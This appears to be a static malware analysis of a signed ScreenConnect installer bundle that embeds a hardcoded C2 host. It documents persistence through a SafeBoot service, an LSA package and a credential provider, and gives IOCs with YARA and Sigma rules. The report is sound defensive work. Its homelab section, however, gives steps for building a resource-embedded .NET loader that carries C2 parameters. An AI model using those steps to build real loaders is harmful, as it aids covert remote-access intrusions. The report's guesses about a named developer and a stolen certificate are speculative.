connectwise: 7145e8 — Self-contained MSI-based ScreenConnect client installer

Executive Summary

A 5.6 MB PE32 (MSI installer bundle) embedding the full ConnectWise ScreenConnect client stack — signed with a valid ConnectWise, LLC Authenticode certificate via DigiCert. Unlike the newer ClickOnce bootstrapper sibling (81adbf9a), this sample uses a custom C++ wrapper (DotNetRunner) to load the embedded .NET Framework 2.0 assemblies out of its .rsrc section, with a hardcoded C2 endpoint (134.122.4.2:8041) baked into an embedded app.config. No CAPE detonation available (no Windows guest); static-only analysis.

What It Is

• Format: PE32 executable (GUI), Intel 80386, 5 sections ^[file.txt]
• Size: 5,641,504 bytes
• Compile time: Fri Nov 18 20:10:20 2022 UTC ^[pefile.txt:34]
• Linker: MSVC 14.33 (Visual Studio 2019/2022, linker 14.33) ^[exiftool.json:18]
• PDB path: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb ^[strings.txt:125] ^[rabin2-info.txt:13]
• Language: C/C++ native wrapper bootstrapping embedded .NET 2.0 assemblies (CIL runtime loaded via mscoree!CorBindToRuntimeEx) ^[rabin2-info.txt:19] ^[pefile.txt:239]
• Signed: Valid Authenticode signature by ConnectWise, LLC (Tampa, Florida), issued by DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 ^[binwalk.txt:30-46] ^[rabin2-info.txt:29]
• Subsystem: Windows GUI (asInvoker execution level from embedded manifest) ^[rabin2-info.txt:34]
• Guard flags: /DYNAMICBASE, /NXCOMPAT, Terminal Server aware; no CFG ^[pefile.txt:73]
• No packing, no obfuscation, no anti-debug, no VM checks. Evasion is the signature itself.^[triage.json]

OpenCTI labels: connectwise, exe, urlhaus ^[triage.json:7-11].

How It Works

Stage 1 — Native C++ Bootstrap

entry0 is standard MSVC CRT startup (security-cookie init, TLS callback dispatch) that calls main at 0x401140 ^[rabin2-info.txt]. The wrapper:

1. Loads mscoree.dll via LoadLibraryW.
2. Resolves CorBindToRuntimeEx to spin up the CLR 2.0 runtime ^[pefile.txt:239].
3. Enumerates named resources in the .rsrc section and loads the embedded assemblies reflectively.

Stage 2 — Embedded .NET Assemblies in .rsrc

The .rsrc section contains five named resource entries (all LANG_NEUTRAL):

This is structurally the full ScreenConnect client installer — not a minimal bootstrapper. The _ENTRYPOINT resource (3 MB) is likely the MSI payload or a compressed cabinet.

Stage 3 — Hardcoded C2 Configuration

An embedded app.config (extracted from offset 0x54D2EC, size 0x188) contains the C2 endpoint:

<value>?h=134.122.4.2&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpRFw9...</value>
``` ^[strings.txt:21148]

Parameters:
- `h=134.122.4.2` — C2 relay host ^[strings.txt:20622]
- `p=8041` — listener port ^[strings.txt:20622]
- `k=` — base64-wrapped RSA public key / session key for ScreenConnect pairing ^[strings.txt:20622]

**Same C2 infrastructure as sibling `81adbf9a`** — shared IP, port, and key blob format. The divergence is deployment mechanism: this sample embeds the full installer and runs it via a .NET loader; `81adbf9a` delegates to ClickOnce/dfshim.

### Stage 4 — Windows Installer (MSI) Artifacts

Binwalk additionally finds two Cabinet archives (`0x26194C` and `0x41B74C`) and MSI descriptor strings inside the `_ENTRYPOINT` resource ^[binwalk.txt:23-25]. The strings table includes:

- `InstallExecuteSequence`, `InstallUISequence`, `LaunchCondition`
- `ProductCode {B292C5EA-BF5F-4280-B056-1670FB10BB1D}`
- `ProductVersion 25.2.4.9229`
- `Manufacturer ScreenConnect Software`
- `ProgramFilesFolder`, `INSTALLLOCATION`
- Service installation entries for `ScreenConnect.ClientService.exe` ^[strings.txt:20275-20277]
- Registry keys for `SafeBoot\Network\[SERVICE_NAME]`, `Lsa\Authentication Packages`, `Credential Providers` ^[strings.txt:20277]

This binary is a **self-extracting MSI bundle** — the native wrapper unpacks and runs the embedded Windows Installer package, which installs ScreenConnect as a system service and registers credential-provider and LSA authentication-package DLLs.

## Decompiled Behavior

**`entry0`** (`0x004014ad`): Standard MSVC CRT `__tmainCRTStartup` — initializes security cookie, runs `__initterm` dynamic initializers, calls `main` at `0x401140`. ^[r2:entry0]

**`main`**: Not fully decompiled due to the .NET runtime indirection. The native side is a thin loader; actual logic lives in the embedded CIL assemblies. What we can observe:
- No direct socket API imports (no `WinINet`, `WinHTTP`, no `WSAStartup`).
- No Crypt32 imports (unlike `81adbf9a`). Certificate trust is handled by the MSI engine during installation, not by this wrapper.
- No anti-debug or anti-VM code paths. The binary trusts the MSI/UAC elevation model and the valid Authenticode signature for evasion.

## C2 Infrastructure

| Indicator | Value | Notes |
|---|---|---|
| **IP** | `134.122.4.2` | C2 host, hard-coded in app.config ^[strings.txt:20622] |
| **Port** | `8041` | Listener port ^[strings.txt:20622] |
| **Key blob** | `BgIAAACkAABSU0ExAAgAA...` | RSA public key / session key ^[strings.txt:20622] |
| **Product** | `ScreenConnect` (v25.2.4.9229) | Version string in resources ^[strings.txt:5153] |
| **Certificate CN** | `ConnectWise, LLC` | Valid DigiCert-issued code-signing cert ^[rabin2-info.txt:29] |

Static-only; no observed DNS or secondary C2.

## Interesting Tidbits

- **Valid signer with attacker-controlled C2.** The binary carries a legitimate ConnectWise Authenticode signature (DigiCert chain). Either a stolen certificate or a compromised build artifact. Once installed via MSI UAC elevation, it registers services and credential providers under a trusted vendor name. ^[strings.txt:5097]
- **Full installer vs. bootstrapper.** This sample (`7145e8`, 5.6 MB, Nov 2022) predates the ClickOnce runner style (`81adbf9a`, 305 KB, Apr 2025) by ~2.5 years. The attacker evolved from bundling the full MSI to a minimal ClickOnce wrapper that stages from the network. See [connectwise](/intel/families/connectwise.html) entity page for the family timeline.
- **PDB leak reveals developer identity.** `C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb` and `C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb` point to a ConnectWise internal developer (`jmorgan`) working on a custom .NET runner project inside the `cwcontrol` repository. ^[strings.txt:125] ^[strings.txt:20429]
- **No obfuscation, no packer.** Strings, imports, PDB, and C2 configuration are all plaintext. Evasion relies entirely on the valid signature and the legitimate tool chain. ^[triage.json]
- **Embedded MSI with SafeBoot service.** The MSI payload registers a service that survives Safe Mode (Network) via `System\CurrentControlSet\Control\SafeBoot\Network\[SERVICE_NAME]` ^[strings.txt:20277]. Persistence across Safe Mode is deliberate.
- **LSA Authentication Package injection.** The MSI writes to `SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages`, inserting `ScreenConnect.WindowsAuthenticationPackage.dll` into the LSA process. This is a credential-grabbing / logon-notification hook. ^[strings.txt:20277]
- **Windows Credential Provider registration.** Also registers a custom credential provider (`CLSID\[CREDENTIAL_PROVIDER_CLASS_ID]\InprocServer32` → `ScreenConnect.WindowsCredentialProvider.dll`), which can harvest logon credentials at the interactive login screen. ^[strings.txt:20277]

## How To Mess With It (Homelab Replication)

**Goal:** Reproduce a native C++ wrapper that loads embedded .NET assemblies from PE resources and passes a hard-coded app.config to the CLR.

**Toolchain:** Visual Studio 2019/2022, C++ project targeting x86, CLR hosting via `mscoree`.

**Steps:**
1. Create a new C++ Win32 project.
2. Add your .NET assemblies (DLLs) as RCData resources with string names.
3. At runtime: `CorBindToRuntimeEx(L"v2.0.50727", NULL, STARTUP_LOADER_OPTIMIZATION_MULTI_DOMAIN, &pCLRMetaHost)`.
4. Use `ICLRRuntimeHost::ExecuteInDefaultAppDomain` or load assemblies via `Assembly::Load` from resource bytes.
5. Write an `app.config` with `<applicationSettings>` containing your C2 parameters.
6. Optionally sign the wrapper with any Authenticode cert from a test CA.

**Verification:** Run on a Windows VM with ProcMon. You should see mscoree.dll loaded, resources extracted to memory, then .NET JIT activity. The process tree will show your wrapper spawning the embedded installer or RAT.

## Deployable Signatures

### YARA rule

```yara
rule connectwise_dotnetrunner_msi_bundle {
    meta:
        description = "ConnectWise DotNetRunner MSI installer bundle with embedded ScreenConnect"
        author = "triage"
        date = "2026-06-15"
        sha256 = "7145e8299053bea02c520460f9a379711ed4455318d434fd5785981295a3a4f4"
    strings:
        $pdb = "DotNetRunner.pdb" ascii wide
        $pdb2 = "DotNetResolver.pdb" ascii wide
        $core = "ScreenConnect.Core" wide
        $windows = "ScreenConnect.Windows" wide
        $installer = "ScreenConnect.WindowsInstaller" wide
        $product = "ScreenConnect Software" wide
        $version = "25.2.4.9229" wide
        $entry = "[_ENTRYPOINT]" wide
        $resolver = "[_RESOLVER]" wide
        $c2_ip = "134.122.4.2" ascii
        $c2_port = "8041" ascii
        $product_code = "{B292C5EA-BF5F-4280-B056-1670FB10BB1D}" wide
    condition:
        uint16(0) == 0x5A4D and
        ($pdb or $pdb2) and
        ($core or $windows or $installer) and
        ($c2_ip or $product_code)
}

Sigma rule

title: ConnectWise ScreenConnect MSI installer bundle execution
status: experimental
description: Detects execution of the ConnectWise DotNetRunner MSI bundle embedding hardcoded C2.
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|contains:
            - 'ScreenConnect.WindowsClient.exe'
            - 'ScreenConnect.ClientService.exe'
        - ParentImage|endswith:
            - 'ScreenConnect.ClientInstallerRunner.exe'
        - Image|endswith:
            - 'ScreenConnect.ClientInstallerRunner.exe'
    selection_registry:
        - TargetObject|contains:
            - 'ScreenConnect.WindowsAuthenticationPackage.dll'
            - 'ScreenConnect.WindowsCredentialProvider.dll'
        - EventType: SetValue
    condition: selection or selection_registry
falsepositives:
    - Legitimate ConnectWise ScreenConnect deployments within an enterprise.
level: medium

IOC list

Behavioral fingerprint

This binary is a native PE32 wrapper that loads mscoree.dll and initializes the CLR 2.0 runtime via CorBindToRuntimeEx. It extracts multiple large RCData resources named SCREENCONNECT.CORE, SCREENCONNECT.WINDOWS, and SCREENCONNECT.WINDOWSINSTALLER from its .rsrc section, then passes control to embedded CIL assemblies. The wrapper contains no direct network imports — all C2 configuration is read from an embedded app.config (XML) that specifies an IP (134.122.4.2), port (8041), and RSA session key. Post-installation, the MSI payload registers a Windows service (SafeBoot network compatible), an LSA authentication package DLL, and a Windows credential provider DLL. The binary is signed with a valid DigiCert-issued Authenticode certificate in the name of ConnectWise, LLC.

Detection Signatures

References

• SHA-256: 7145e8299053bea02c520460f9a379711ed4455318d434fd5785981295a3a4f4
• Source: OpenCTI / abuse.ch urlhaus payloads
• Family entity page: connectwise
• Sibling analysis: raw/analyses/81adbf9a/report.md
• Concept page: legitimate-remote-access-tool-abuse
• Technique page: clickonce-certificate-trust-bootstrap (sibling uses this; this sample predates it)

Provenance

• file.txt — file(1) output
• exiftool.json — ExifTool PE metadata
• pefile.txt — pefile library dump
• strings.txt — strings(1) extraction
• binwalk.txt — Binwalk embedded-artifact scan
• rabin2-info.txt — radare2 binary header summary
• triage.json — triage pipeline metadata
• dynamic-analysis.md — CAPE status: skipped (no Windows guest available)
• radare2 decompilation of entry0 at 0x4014ad
• Manual DER certificate extraction from IMAGE_DIRECTORY_ENTRY_SECURITY at offset 0x54A600

Tools: ExifTool 12.76, pefile, radare2 5.x, binwalk, strings, openssl pkcs7